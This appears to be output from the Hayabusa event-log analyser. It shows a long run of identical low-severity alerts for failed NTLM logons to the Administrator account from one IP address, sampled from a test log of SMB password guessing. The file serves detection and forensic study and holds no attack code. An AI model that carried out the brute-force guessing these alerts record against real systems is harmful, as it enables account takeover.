01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 